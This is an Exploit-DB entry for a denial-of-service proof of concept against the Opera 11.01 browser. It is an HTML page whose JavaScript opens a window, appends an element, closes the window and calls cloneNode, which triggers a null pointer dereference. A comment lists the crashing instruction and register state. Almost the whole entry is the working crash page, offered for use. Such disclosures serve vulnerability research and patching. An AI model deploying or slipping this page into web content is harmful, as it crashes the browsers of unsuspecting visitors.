Opera 11.01 - NULL PTR Dereference

EDB-ID:

16979

CVE:

N/A


Author:

echo

Type:

dos


Platform:

Windows

Date:

2011-03-15


<html>
  <head>
  <title>Opera 11.01 Null Ptr Derefer</title>
  </head>
  <body>
   <script type="text/JavaScript" language="JavaScript">
   
    /*
    * [+]. Title : Opera 11.01 Null Pointer Derefernce 
    * [+]. Date : 15.03.2011 05:18
    * [+]. Author: echo
    * [+]. Version: 11.01
    * [+]. Software link: http://www.opera.com/download/
    * [+]. Tested on : Win32 xp home sp 2
    * [+]. CVE : NULL    
    * ---------------------------------------
    * 675B5646  MOV ECX,DWORD PTR DS:[EDI+8]   
    * DS:[00000008]=???
    * ECX=00000000   
    * EDI=00000000                    
    */
    var iWin  = window.open();
    var iShit = iWin.document.createElement("ANY");
        iWin.document.body.appendChild(iShit);
        iWin.close();
        iWin.document.cloneNode("HiH");  
        
   </script>
  </body>
</html>